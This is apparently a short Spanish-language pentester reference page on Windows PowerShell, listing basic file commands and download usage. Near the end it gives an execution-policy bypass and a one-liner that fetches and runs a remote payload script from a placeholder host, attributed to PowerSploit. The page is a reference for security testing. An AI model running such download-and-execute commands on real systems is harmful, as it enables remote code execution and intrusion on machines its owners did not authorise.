PowerShell en Windows

PowerShell es una shell más avanzada y potente que CMD, y su binario se encuentra en:

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Comandos Esenciales para Pentesters

  1. Ejecutar Comandos Básicos:

    Get-ChildItem -Path C:\ruta\del\directorio
  2. Copiar Archivos:

    Copy-Item -Path archivo_origen -Destination archivo_destino
  3. Eliminar Archivos:

    Remove-Item -Path archivo
  4. Descargar Archivos desde la Web:

    Invoke-WebRequest -Uri http://example.com/file.txt -OutFile C:\ruta\file.txt

Información Relevante

  • Bypass de Ejecución de Scripts: PowerShell puede estar configurado para bloquear la ejecución de scripts por políticas de seguridad. Para omitir esta restricción:

    Set-ExecutionPolicy -ExecutionPolicy Bypass -Scope Process
  • Exploits y Payloads: PowerShell es una herramienta potente para la ejecución de payloads en pentesting, como los scripts de PowerSploit:

    IEX (New-Object Net.WebClient).DownloadString('http://example.com/payload.ps1')

Última actualización

¿Te fue útil?